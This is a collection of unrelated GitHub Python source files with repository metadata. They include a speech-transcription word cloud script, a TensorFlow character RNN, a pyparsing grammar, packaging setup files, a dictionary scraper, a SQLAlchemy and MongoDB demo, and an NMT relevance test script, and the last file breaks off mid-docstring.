+{"seq_id":"72233536999","text":"import matplotlib as mpl\nimport os\nimport re\nfrom os.path import join, dirname\nfrom dotenv import load_dotenv\nfrom google.cloud import speech_v1p1beta1 as speech\nfrom google.cloud import translate_v2 as translate\nfrom wordcloud import WordCloud\nimport matplotlib.pyplot as plt\nfrom janome.tokenizer import Tokenizer\n\n# 環境変数に認証ファイルのパスを設定\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"credentials.json\"\nmpl.rcParams['font.family'] = 'Noto Sans JP'\n\n\ndef transcribe_audio():\n client = speech.SpeechClient()\n\n\n # audio = speech.RecognitionAudio(content=content)\n uri = os.environ.get(\"AUDIO_URI\")\n audio = speech.RecognitionAudio(uri=uri)\n\n config = speech.RecognitionConfig(\n encoding=speech.RecognitionConfig.AudioEncoding.LINEAR16,\n sample_rate_hertz=48000,\n language_code=\"es-ES\",\n )\n\n operation = client.long_running_recognize(config=config, audio=audio)\n print(\"Waiting for operation to complete...\")\n response = operation.result(timeout=90)\n\n transcript = \"\"\n for result in response.results:\n transcript += result.alternatives[0].transcript\n\n return transcript\n\n\ndef translate_text(text):\n translate_client = translate.Client()\n\n result = translate_client.translate(text, target_language='ja')\n\n return result['translatedText']\n\n\ndef extract_words(text, exclusion=[]):\n token = Tokenizer().tokenize(text)\n words = []\n\n for line in token:\n tkn = re.split('\\t|,', str(line))\n if (tkn[1] in ['名詞'] and tkn[2] in ['一般', '固有名詞']) or (tkn[1] in ['動詞', '形容詞']):\n words.append(tkn[7])\n\n return ' ' . join(words)\n\n\ndef create_word_cloud(words, output_file):\n font_path = os.path.abspath(\"NotoSansJP-VariableFont_wght.ttf\")\n\n wordcloud = WordCloud(background_color='white',\n font_path=font_path, width=2000, height=1500, prefer_horizontal=1, margin=10).generate(words)\n plt.figure(figsize=(8, 8), facecolor=None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad=0)\n\n plt.savefig(output_file)\n\n\ndef main():\n dotenv_path = join(dirname(__file__), '.env')\n load_dotenv(dotenv_path)\n\n transcribed_text = transcribe_audio()\n print(transcribed_text)\n\n with open('transcribed_text_es.txt', 'w') as f:\n f.write(transcribed_text)\n\n print(\"Translating text...\")\n translated_text = translate_text(transcribed_text)\n with open('translated_text_ja.txt', 'w') as f:\n f.write(translated_text)\n\n words = extract_words(translated_text)\n\n print(\"Creating word cloud...\")\n create_word_cloud(words, 'word_cloud.png')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kurikin/spanish-text-mining","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36501896171","text":"import tkFont\r\nfrom Tkinter import *\r\nimport Tkinter as tk\r\nfrom threading import Thread, current_thread\r\nimport time\r\n\r\nclass Chronometre(Thread):\r\n\tdef __init__(self, node, g, t, score):\r\n\t\tThread.__init__(self)\r\n\t\tself.node= node\r\n\t\tself.t= 0\r\n\t\tself.state= False\r\n\t\tself.g= g\r\n\t\tself.daemon= True\r\n\t\tself.f1= tkFont.Font(family=\"Helvetica Neue\",size=30,weight=\"normal\")\r\n\t\tself.f2= tkFont.Font(family=\"Helvetica Neue\",size=15,weight=\"normal\")\r\n\t\tself.scoreText= Label(self.node,text=\"cc\")\r\n\t\tself.timeText= Label(self.node, text=\"zef\")\r\n\t\t\r\n\t\tself.scoreText.place(x=275, y=20)\r\n\t\tself.timeText.place(x=600, y=20)\r\n\r\n\tdef paint(self):\r\n\t\tself.scoreText.configure(text=\"Score: \"+str(self.g.getScore()))\r\n\t\tself.timeText.configure(text=\"Temps: \"+str(self.t)+\"s\")\r\n\r\n\t\tself.scoreText.place(x=275, y=20)\r\n\t\tself.timeText.place(x=600, y=20)\r\n\tdef run(self):\r\n\t\ti= 1\r\n\t\twhile True:\r\n\t\t\tif self.g.getState():\r\n\t\t\t\tif(i == 0):\r\n\t\t\t\t\tself.t+= 1\r\n\t\t\t\ttime.sleep(.01)\r\n\t\t\t\ti= (i+1)%99\r\n\t\t\t\tself.g.paint()\r\n","repo_name":"mehdibouchet/ex3_2_python","sub_path":"Chronometre.py","file_name":"Chronometre.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36345472668","text":"# encoding:utf-8\nfrom __future__ import unicode_literals\n\nfrom re import IGNORECASE\n\nimport pyparsing as pp\n\nfrom gr_devices import devices\nfrom gr_attributes import attributes, var_smartphone_attributes, attribute_value_spec\n\nyes_no = pp.Group(pp.Or([\n pp.oneOf(['ja', 'jo', 'jupp', 'OK'], caseless=True)('yes_no:yes'),\n pp.oneOf(['nein', 'nee', 'nö'], caseless=True)('yes_no:no')\n])).setResultsName('yes_no')\n\ndevices_and_attributes = pp.Or([\n pp.Group(\n attributes + pp.Or([\"des\", \"vom\", \"beim\"]) + devices\n ).setResultsName('get_attribute'),\n pp.Group(\n pp.Regex('Hat (das|der|die)', IGNORECASE) + devices + pp.Regex('eine?n?') + attributes\n ).setResultsName('get_attribute'),\n pp.Group(\n pp.Regex('Ist (das|der|die)', IGNORECASE) + devices + attributes\n ).setResultsName('get_attribute'),\n pp.Group(\n pp.oneOf([\"Mit\", \"In\"], caseless=True) + \"welchen\" + attributes + \"gibt es das\" + devices\n ).setResultsName('get_options'),\n pp.Group(\n devices + pp.oneOf([\"mit\", \"in\", \"von\"]) + attribute_value_spec\n ).setResultsName('get_entities')\n])\n\nmain = pp.Or([\n pp.SkipTo(devices_and_attributes) + devices_and_attributes,\n yes_no\n])\n\n\n\nif __name__ == '__main__':\n main.parseString(\"In welchen Speichergrößen gibt es das iPhone7\")\n main.parseString(\"Arbeitsspeicher des Sony XperiaXZ Premium\")\n main.parseString(\"iPhone 7 mit mehr als 16 GB Arbeitsspeicher\")\n main.parseString(\"iPhone 7 mit Fingerabdrucksensor\")\n main.parseString(\"iPhone 7 mit mehr als 100 GB Speichergröße\")\n main.parseString(\"WLAN-Standards des Speedport W 921V\")\n main.parseString(\"Hat das Speedport W 921V eine integrierte DECT-Basis\")\n main.parseString(\"Anzahl Ethernet-Anschlüsse des Speedport W 921 V\")\n main.parseString(\"iPhone7 mit mehr als 2 Anzahl Ethernet-Anschlüsse\")\n main.parseString(\"Ist das Speedport W 921V VDSL-kompatibel\")\n","repo_name":"KlausEngelbrecht/HackathonNLU","sub_path":"gr_main.py","file_name":"gr_main.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24568746912","text":"\"\"\"\nVanilla Char-RNN using TensorFlow by Vinh Khuc (@knvinh).\nAdapted from Karpathy's min-char-rnn.py\nhttps://gist.github.com/karpathy/d4dee566867f8291f086\nRequires tensorflow>=1.0\nBSD License\n\nOriginal code from: Vinh Khuc (@knvinh)\nModified by: Marianne Linhares (@mari-linhares)\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\n\n\n# helper functions\ndef one_hot(v):\n return np.eye(VOCAB_SIZE)[v]\n\n# data I/O\n\n# should be simple plain text file\ndata = open('data/about_tensorflow.txt', 'r').read()\nchars = list(set(data))\n\nDATA_SIZE, VOCAB_SIZE = len(data), len(chars)\nprint('data has %d characters, %d unique.' % (DATA_SIZE, VOCAB_SIZE))\n\nchar_to_ix = {ch: i for i, ch in enumerate(chars)}\nix_to_char = {i: ch for i, ch in enumerate(chars)}\n\n# hyperparameters\nHIDDEN_SIZE = 100 # hidden layer's size\nSEQ_LENGTH = 25 # number of steps to unroll\nLEARNING_RATE = 1e-1 # size of step for Gradient Descent\n\n# TensorFlow graph definition\n\n# Placeholders\ninputs = tf.placeholder(shape=[None, VOCAB_SIZE], dtype=tf.float32,\n name='inputs')\ntargets = tf.placeholder(shape=[None, VOCAB_SIZE], dtype=tf.float32,\n name='targets')\ninit_state = tf.placeholder(shape=[1, HIDDEN_SIZE], dtype=tf.float32,\n name='state')\n\n# Random initializer will be used by all variables\ninitializer = tf.random_normal_initializer(stddev=0.01)\n\n\n# Initialize the RNN\ndef get_RNN_variables(reuse):\n with tf.variable_scope('RNN', reuse=reuse):\n # hidden layer\n Wxh = tf.get_variable('Wxh', [VOCAB_SIZE, HIDDEN_SIZE],\n initializer=initializer)\n Whh = tf.get_variable('Whh', [HIDDEN_SIZE, HIDDEN_SIZE],\n initializer=initializer)\n bh = tf.get_variable('bh', [HIDDEN_SIZE],\n initializer=initializer)\n\n # output layer\n Why = tf.get_variable('Why', [HIDDEN_SIZE, VOCAB_SIZE],\n initializer=initializer)\n by = tf.get_variable('by', [VOCAB_SIZE],\n initializer=initializer)\n\n return Wxh, Whh, bh, Why, by\n\n# Train the rnn\n\n# defining the initial state of the RNN\nhs_t = init_state\n\n# initialize RNN variables\nget_RNN_variables(reuse=False)\n\n# getting RNN variables\nWxh, Whh, bh, Why, by = get_RNN_variables(reuse=True)\n\n# Keep track of all outputs\nys = []\nfor t, xs_t in enumerate(tf.split(inputs, SEQ_LENGTH, axis=0)):\n # hidden layer output\n hs_t = tf.tanh(tf.matmul(xs_t, Wxh) + tf.matmul(hs_t, Whh) + bh)\n\n # final output\n ys_t = tf.matmul(hs_t, Why) + by\n ys.append(ys_t)\n\n# Saves last hidden state\nhprev = hs_t\n# Concat outputs\noutputs = tf.concat(ys, axis=0)\n# Loss\nloss = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(labels=targets,\n logits=outputs))\n\n# Minimizer\nminimizer = tf.train.AdagradOptimizer(learning_rate=LEARNING_RATE,\n use_locking=True)\n# Here's where the magic happens!\ngrads_and_vars = minimizer.compute_gradients(loss)\n\n# Gradient clipping\ngrad_clipping = tf.constant(5.0, name='grad_clipping')\nclipped_grads_and_vars = []\nfor grad, var in grads_and_vars:\n clipped_grad = tf.clip_by_value(grad, -grad_clipping, grad_clipping)\n clipped_grads_and_vars.append((clipped_grad, var))\n\n# Gradient updates\n# more magic!!!\nupdates = minimizer.apply_gradients(clipped_grads_and_vars)\n\n# Sampling\nWxh, Whh, bh, Why, by = get_RNN_variables(reuse=True)\nh_sample = tf.tanh(tf.matmul(inputs, Wxh) + tf.matmul(init_state, Whh) + bh)\ny_sample = tf.matmul(h_sample, Why) + by\npred_sample = tf.nn.softmax(y_sample)\n\n# Create session and initialize variables\nsess = tf.Session()\ninit = tf.global_variables_initializer()\nsess.run(init)\n\n# Training\n\n# n: counts the number of steps, p: pointer to position in sequence\nn, p = 0, 0\n\n# this var will be used for sampling\nhprev_val = np.zeros([1, HIDDEN_SIZE])\n\n# loss at iteration 0\nsmooth_loss = -np.log(1.0 / VOCAB_SIZE) * SEQ_LENGTH\n\nwhile True:\n\n # prepare inputs (we're sweeping from left to right in steps SEQ_LENGTH long)\n if p + SEQ_LENGTH + 1 >= len(data) or n == 0:\n hprev_val = np.zeros([1, HIDDEN_SIZE]) # reset RNN memory\n p = 0 # go from start of data\n\n input_vals = [char_to_ix[ch] for ch in data[p:p + SEQ_LENGTH]]\n target_vals = [char_to_ix[ch] for ch in data[p + 1:p + SEQ_LENGTH + 1]]\n\n input_vals_onehot = one_hot(input_vals)\n target_vals_onehot = one_hot(target_vals)\n\n # sampling\n if n % 1000 == 0:\n sample_length = 200\n hprev_sample = np.copy(hprev_val)\n\n # start from the first letter from the input\n x = np.zeros((VOCAB_SIZE, 1))\n x[input_vals[0]] = 1\n\n # stores predictions\n sample_ix = []\n for t in range(sample_length):\n # reshaping so it has the same shape as TensorFlow input\n x = np.reshape(x, [-1, VOCAB_SIZE])\n\n pred, hprev_sample = sess.run([pred_sample, h_sample],\n feed_dict={inputs: x,\n init_state: hprev_sample})\n # generates next letter\n ix = np.random.choice(range(VOCAB_SIZE), p=pred.ravel())\n # update next char with the prediction\n x = np.zeros((VOCAB_SIZE, 1))\n x[ix] = 1\n sample_ix.append(ix)\n\n txt = ''.join(ix_to_char[ix] for ix in sample_ix)\n print('----\\n%s\\n----' % (txt))\n\n # training\n hprev_val, loss_val, _ = sess.run([hprev, loss, updates],\n feed_dict={inputs: input_vals_onehot,\n targets: target_vals_onehot,\n init_state: hprev_val})\n\n # print progress\n smooth_loss = smooth_loss * 0.999 + loss_val * 0.001\n if n % 100 == 0:\n print('iter %d, loss: %f' % (n, smooth_loss))\n\n p += SEQ_LENGTH\n n += 1\n","repo_name":"modi975/tensorflow-workshop","sub_path":"code_samples/RNN/min_char_rnn/tensorflow_min_char_rnn.py","file_name":"tensorflow_min_char_rnn.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34231936978","text":"# Import required functions\nfrom setuptools import setup, find_packages\n\n# read the contents of your README file\nfrom pathlib import Path\nthis_directory = Path(__file__).parent\nlong_description = (this_directory / \"README.md\").read_text()\n\n# Call setup function\nsetup(\n author=\"Javad Ebadi, Vahid Hoseinzade\",\n author_email=\"javad.ebadi.1990@gmail.com, vahid.hoseinzade64@gmail.com\",\n description=\"A simple python wrapper for inspirehep API\",\n name=\"pyinspirehep\",\n packages=find_packages(include=[\"pyinspirehep\", \"pyinspirehep.*\"]),\n version=\"1.1.1\",\n install_requires=['requests'],\n python_requires='>=3.7',\n license='MIT',\n url='https://github.com/javadebadi/pyinspirehep',\n long_description=long_description,\n long_description_content_type='text/markdown'\n)\n","repo_name":"javadebadi/pyinspirehep","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75393946919","text":"from setuptools import setup, find_packages\n\n\nVERSION = \"0.3.0\"\n\nsetup(\n name='pulumi_ipwt_gcp',\n version=VERSION,\n description=\"Pulumi dynamic provider package for GCP by IPWT.PL\",\n url='https://github.com/mszewczyk-ipwt/pulumi-ipwt-gcp',\n project_urls={\n 'Repository': 'https://github.com/mszewczyk-ipwt/pulumi-ipwt-gcp'\n },\n packages=find_packages(),\n license='Apache-2.0',\n install_requires=[\n 'pulumi',\n 'google-auth',\n ],\n zip_safe=False\n)\n","repo_name":"mszewczyk-ipwt/pulumi-ipwt-gcp","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6323195146","text":"\n\ndef get_eg(word):\n import requests\n\n url = f'https://www.dictionary.com/browse/{word}'\n response = requests.get(url)\n\n html = response.text\n\n from bs4 import BeautifulSoup\n\n soup = BeautifulSoup(html, 'html.parser')\n\n sort = soup.find(id= \"examples-section\")\n egs = sort.find_all(class_=\"one-click-content css-b5q2lz e15kc6du2\")\n \n result = [] \n ran = len(egs) \n if len(egs) >5:\n ran =5\n for i in range(ran):\n result.append( f\"{i+1}. \"+egs[i].text)\n \n result = '
    '.join(result)\n return result \n \n\n\n\ndef search_word(word):\n \n import requests\n\n url = f'https://www.dictionary.com/browse/{word}'\n response = requests.get(url)\n\n html = response.text\n\n from bs4 import BeautifulSoup\n\n soup = BeautifulSoup(html, 'html.parser')\n\n sort = soup.find(class_= \"css-1avshm7 e16867sm0\")\n area = sort.find_all(class_=\"one-click-content css-nnyc96 e1q3nk1v1\" ) \n\n result = []\n for i in range(len(area)):\n mod = area[i].text.replace(':','/ eg:')\n result.append(f'{i+1}. '+mod) \n \n result = '
    '.join(result)\n return result \n\n\n\n\ndef get_back(word):\n \n defin = search_word(word)\n eg = get_eg(word)\n \n ret = defin +'

    '+'Examples:'+'

    '+eg\n \n return ret \n\n\ndef create_vocab(word_list):\n import tqdm\n import time\n\n global box\n #global name\n #global back\n name = []\n back = []\n box = pd.DataFrame()\n for i in tqdm.tqdm_notebook(range(len(word_list))):\n try:\n back.append( get_back( word_list[i] ))\n name.append(word_list[i])\n except AttributeError as e:\n print(e)\n\n\n box['word'] = name\n box['back'] = back\n box.set_index('word' , inplace =True )\n\n return box","repo_name":"rogJohn01/Vocab_crawler-FC-","sub_path":"Vocab_crawler.py","file_name":"Vocab_crawler.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22050734749","text":"import pprint\n\nimport pymongo as pymongo\nfrom sqlalchemy import inspect, select\nfrom sqlalchemy.orm import Session\nimport instances_sqlAlchemy\n\n\nif __name__ == '__main__':\n Base = instances_sqlAlchemy.Base\n engine = instances_sqlAlchemy.engine\n Cliente = instances_sqlAlchemy.Cliente\n Conta = instances_sqlAlchemy.Conta\n\n Base.metadata.create_all(engine)\n inspector_engine = inspect(engine)\n print(inspector_engine.get_table_names())\n\n with Session(engine) as session:\n andre = Cliente(\n name='André',\n cpf='153478965',\n endereco='rua 2, casa 33',\n conta=[Conta(tipo='corrente',\n agencia=1,\n saldo=1000.0,\n num=756471)]\n )\n\n pedro = Cliente(\n name='Pedro',\n cpf='698478965',\n endereco='rua 5, casa 50',\n conta=[Conta(tipo='corrente',\n agencia=1,\n saldo=0,\n num=756741),\n Conta(tipo='poupanca',\n saldo=500.0,\n agencia=1,\n num=756881)]\n )\n\n joao = Cliente(\n name='José',\n cpf='153471585',\n endereco='rua 7, casa 1',\n )\n\n # Enviando para o Banco de dados (persistência de dados)\n session.add_all([andre, pedro, joao])\n\n session.commit()\n\n print('estabelecendo uma query para Clientes')\n stmt = select(Cliente)\n print(stmt)\n for cliente in session.scalars(stmt):\n print(cliente)\n\n print('estabelecendo uma query para Conta')\n stmt = select(Conta)\n print(stmt)\n for conta in session.scalars(stmt):\n print(conta)\n\n print('estabelecendo uma query para Conta')\n stmt_join = select(Cliente.name,\n Cliente.cpf,\n Cliente.endereco,\n Conta.tipo,\n Conta.agencia,\n Conta.num,\n Conta.saldo).join_from(Cliente, Conta)\n connection = engine.connect()\n results = connection.execute(stmt_join).fetchall()\n mongo_list = list()\n for result in results:\n dado_cliente = list(result)\n mongo_data= {\"nome\":dado_cliente[0],\n \"cpf\":dado_cliente[1],\n \"endereco\": dado_cliente[2],\n \"tipo\":dado_cliente[3],\n \"agencia\":dado_cliente[4],\n \"num\": dado_cliente[5],\n \"saldo\": dado_cliente[6]\n }\n mongo_list.append(mongo_data)\n\n\n\n client = pymongo.MongoClient(\n 'MongoDB-URI')\n db = client.banco\n clientes_contas = db.clientes_contas\n clientes_contas.insert_many(mongo_list)\n\n for cliente_conta in clientes_contas.find():\n pprint.pprint(cliente_conta)\n","repo_name":"andrejfg/Estudos_SQLAlchemy_pyMongo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14142844742","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport itertools\nimport os\nimport time\n\nimport numpy as np\nimport numpy\nimport tensorflow as tf\nimport thumt.data.record as record\nimport thumt.data.dataset as dataset\nimport thumt.data.vocab as vocabulary\nimport thumt.models as models\nimport thumt.utils.search as search\n\ndef normalize(matrix):\n matrix = numpy.abs(matrix)\n total = numpy.sum(matrix, -1)\n return matrix / numpy.expand_dims(total, -1) \n\ndef get_rlv_encoder_vector(w_x_newh, w_h_newh, enc_h, back=False):\n '''\n w_h_newh: [len_src, 1]\n w_x_newh: [len_src, 1]\n enc_h: [1, len_src, dim]\n '''\n len_src = w_x_newh.shape[0]\n r = numpy.zeros((len_src, len_src), dtype = 'float32') \n print(r.shape)\n R = numpy.zeros((len_src, len_src), dtype=\"float32\")\n for i in range(len_src):\n for j in range(i+1):\n if i == j:\n r[i,j] = w_x_newh[i][0]\n else:\n if i == 0:\n tmp = 0\n else:\n tmp = r[i-1,j]\n # relevance h_i, x_j\n r[i][j] = tmp * w_h_newh[i][0]\n if back:\n r = r[::-1, ::-1]\n for i in range(len_src): # hidden\n for j in range(len_src): # src\n R[i][j] = r[i][j] * numpy.sum(enc_h[0,i]) \n # print out \n R = normalize(R)\n print('encoder:', R)\n return r, R\n\ndef to_text(vocab, mapping, indice, params):\n print('idce', indice)\n decoded = []\n for idx in indice:\n if idx == mapping[params.eos]:\n break\n decoded.append(vocab[idx])\n\n decoded = \" \".join(decoded)\n return decoded\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=\"Translate using existing NMT models\",\n usage=\"translator.py [] [-h | --help]\"\n )\n\n # input files\n parser.add_argument(\"--input\", type=str, nargs=2, required=True,\n help=\"Path of input file\")\n parser.add_argument(\"--checkpoints\", type=str, nargs=\"+\", required=True,\n help=\"Path of trained models\")\n parser.add_argument(\"--vocabulary\", type=str, nargs=2, required=True,\n help=\"Path of source and target vocabulary\")\n\n # model and configuration\n parser.add_argument(\"--models\", type=str, required=True, nargs=\"+\",\n help=\"Name of the model\")\n parser.add_argument(\"--parameters\", type=str,\n help=\"Additional hyper parameters\")\n\n return parser.parse_args()\n\n\ndef default_parameters():\n params = tf.contrib.training.HParams(\n input=None,\n output=None,\n vocabulary=None,\n model=None,\n\n batch_size=1,\n max_length=25,\n length_multiplier=1,\n mantissa_bits=2,\n buffer_size=10000,\n constant_batch_size=True,\n # vocabulary specific\n pad=\"\",\n bos=\"\",\n eos=\"\",\n unk=\"\",\n mapping=None,\n append_eos=False,\n # decoding\n top_beams=1,\n beam_size=4,\n decode_alpha=0.6,\n decode_length=50,\n decode_batch_size=32,\n decode_constant=5.0,\n decode_normalize=False,\n device_list=[0],\n num_threads=6\n )\n\n return params\n\n\ndef merge_parameters(params1, params2):\n params = tf.contrib.training.HParams()\n\n for (k, v) in params1.values().iteritems():\n params.add_hparam(k, v)\n\n params_dict = params.values()\n\n for (k, v) in params2.values().iteritems():\n if k in params_dict:\n # Override\n setattr(params, k, v)\n else:\n params.add_hparam(k, v)\n\n return params\n\n\ndef import_params(model_dir, model_name, params):\n model_dir = os.path.abspath(model_dir)\n m_name = os.path.join(model_dir, model_name + \".json\")\n\n if not tf.gfile.Exists(m_name):\n return params\n\n with tf.gfile.Open(m_name) as fd:\n tf.logging.info(\"Restoring model parameters from %s\" % m_name)\n json_str = fd.readline()\n params.parse_json(json_str)\n\n return params\n\n\ndef override_parameters(params, args):\n if args.parameters:\n params.parse(args.parameters)\n\n params.vocabulary = {\n \"source\": vocabulary.load_vocabulary(args.vocabulary[0]),\n \"target\": vocabulary.load_vocabulary(args.vocabulary[1])\n }\n params.vocabulary[\"source\"] = vocabulary.process_vocabulary(\n params.vocabulary[\"source\"], params\n )\n params.vocabulary[\"target\"] = vocabulary.process_vocabulary(\n params.vocabulary[\"target\"], params\n )\n\n control_symbols = [params.pad, params.bos, params.eos, params.unk]\n\n params.mapping = {\n \"source\": vocabulary.get_control_mapping(\n params.vocabulary[\"source\"],\n control_symbols\n ),\n \"target\": vocabulary.get_control_mapping(\n params.vocabulary[\"target\"],\n control_symbols\n )\n }\n\n return params\n\n\ndef session_config(params):\n optimizer_options = tf.OptimizerOptions(opt_level=tf.OptimizerOptions.L1,\n do_function_inlining=False)\n graph_options = tf.GraphOptions(optimizer_options=optimizer_options)\n config = tf.ConfigProto(allow_soft_placement=True,\n graph_options=graph_options)\n if params.device_list:\n device_str = \",\".join([str(i) for i in params.device_list])\n config.gpu_options.visible_device_list = device_str\n\n return config\n\n\ndef set_variables(var_list, value_dict, prefix):\n ops = []\n for var in var_list:\n for name in value_dict:\n var_name = \"/\".join([prefix] + list(name.split(\"/\")[1:]))\n\n if var.name[:-2] == var_name:\n tf.logging.info(\"restoring %s -> %s\" % (name, var.name))\n with tf.device(\"/cpu:0\"):\n op = tf.assign(var, value_dict[name])\n ops.append(op)\n break\n\n return ops\n\n\ndef main(args):\n tf.logging.set_verbosity(tf.logging.INFO)\n # Load configs\n model_cls_list = [models.get_model(model) for model in args.models]\n params_list = [default_parameters() for _ in range(len(model_cls_list))]\n params_list = [\n merge_parameters(params, model_cls.get_parameters())\n for params, model_cls in zip(params_list, model_cls_list)\n ]\n params_list = [\n import_params(args.checkpoints[i], args.models[i], params_list[i])\n for i in range(len(args.checkpoints))\n ]\n params_list = [\n override_parameters(params_list[i], args)\n for i in range(len(model_cls_list))\n ]\n\n # Build Graph\n with tf.Graph().as_default():\n model_var_lists = []\n\n # Load checkpoints\n for i, checkpoint in enumerate(args.checkpoints):\n print(\"Loading %s\" % checkpoint)\n var_list = tf.train.list_variables(checkpoint)\n values = {}\n reader = tf.train.load_checkpoint(checkpoint)\n\n for (name, shape) in var_list:\n if not name.startswith(model_cls_list[i].get_name()):\n continue\n\n if name.find(\"losses_avg\") >= 0:\n continue\n\n tensor = reader.get_tensor(name)\n values[name] = tensor\n\n model_var_lists.append(values)\n\n # Build models\n model_fns = []\n\n for i in range(len(args.checkpoints)):\n name = model_cls_list[i].get_name()\n model = model_cls_list[i](params_list[i], name + \"_%d\" % i)\n model_fn = model.get_relevance_func()\n model_fns.append(model_fn)\n\n params = params_list[0]\n # Build input queue\n features = dataset.get_training_input(args.input, params)\n relevances = model_fns[0](features, params)\n\n assign_ops = []\n\n all_var_list = tf.trainable_variables()\n\n for i in range(len(args.checkpoints)):\n un_init_var_list = []\n name = model_cls_list[i].get_name()\n\n for v in all_var_list:\n if v.name.startswith(name + \"_%d\" % i):\n un_init_var_list.append(v)\n\n ops = set_variables(un_init_var_list, model_var_lists[i],\n name + \"_%d\" % i)\n assign_ops.extend(ops)\n\n assign_op = tf.group(*assign_ops)\n\n sess_creator = tf.train.ChiefSessionCreator(\n config=session_config(params)\n )\n\n\n\n results = []\n num = 10\n count = 0\n hooks = [tf.train.LoggingTensorHook({}, every_n_iter=1)]\n with tf.train.MonitoredSession(session_creator=sess_creator, hooks=hooks) as sess:\n # Restore variables\n sess.run(assign_op)\n src_seq, trg_seq, rlv_info, loss = sess.run(relevances)\n start = time.time()\n while count < num:#not sess.should_stop():\n src_seq, trg_seq, rlv_info, loss = sess.run(relevances)\n print('--result--')\n print('loss:', loss)\n for i in range(src_seq.shape[0]):\n src = to_text(params.vocabulary[\"source\"], params.mapping[\"source\"], src_seq[i], params)\n trg = to_text(params.vocabulary[\"target\"], params.mapping[\"target\"], trg_seq[i], params)\n print('sentence %d' %i)\n print('src:', src)\n print('src_idx:', src_seq[i])\n print('trg:', trg)\n print('trg_idx:', trg_seq[i])\n print('result:',rlv_info[\"result\"][i])\n count += 1\n end = time.time()\n print('total time:',end-start)\n\nif __name__ == \"__main__\":\n main(parse_args())\n","repo_name":"THUNLP-MT/THUCC","sub_path":"MachineTranslation/code/THUMT/thumt/bin/test_lrp_rnnsearch.py","file_name":"test_lrp_rnnsearch.py","file_ext":"py","file_size_in_byte":9848,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"18"} +{"seq_id":"14545696448","text":"def string_match(a, b):\n if len(a) < len(b):\n r = len(a)-1\n else:\n r = len(b)-1\n timesFound = 0\n for x in range(r):\n if (a[x] == b[x]) and (a[x+1] == b[x+1]):\n timesFound += 1\n return timesFound\n\nprint(string_match('abc', 'axc'))\n","repo_name":"Vagelis-Prokopiou/python-challenges","sub_path":"codingbat.com/Warmup-2/string_match.py","file_name":"string_match.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28967052840","text":"from django.shortcuts import render\nfrom app.models import *\n\n# Create your views here.\n\ndef index(request):\n info = Info.objects.all()\n projects = Projects.objects.all()\n context = {'info':info,\n 'projects':projects\n }\n return render(request,'index.html',context)\n\n\n","repo_name":"dhimanromanregins/portfolio","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25637040060","text":"\"\"\"Добавление заработка в модель курьера\n\nRevision ID: 4c077b9f2caa\nRevises: 8a71156a212a\nCreate Date: 2021-07-08 21:46:09.667851\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4c077b9f2caa'\ndown_revision = '8a71156a212a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('courier', sa.Column('earnings', sa.Float(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('courier', 'earnings')\n # ### end Alembic commands ###\n","repo_name":"lizatish/YandexBackendSchool2021","sub_path":"migrations/versions/4c077b9f2caa_добавление_заработка_в_модель_курьера.py","file_name":"4c077b9f2caa_добавление_заработка_в_модель_курьера.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11695948109","text":"import humanize\n\nimport lambentlight.client as client\n\n\nasync def print_servers():\n \"\"\"\n Prints the servers currently running.\n \"\"\"\n # Request the list of servers\n servers = await client.get(\"/servers\")\n # Format them to the correct value\n values = []\n for name, info in servers.items():\n values.append([name, info[\"cpu\"], humanize.naturalsize(info[\"mem\"])])\n # And print them to the user\n client.print_with_header([\"Name\", \"CPU%\", \"Memory Usage\"], *values)\n","repo_name":"LambentLight/LambentLight","sub_path":"LambentLight.Client/lambentlight/client/servers.py","file_name":"servers.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"18"} +{"seq_id":"1174658879","text":"\"\"\"\nThis module creates a curve and builds a new 5 year swap and an existing swap\nand prints out the float and fixed PVs. The existing swap and the new swap are\nidentical thus should give the same results. It also defines a function:\nSanityCheck, this loops 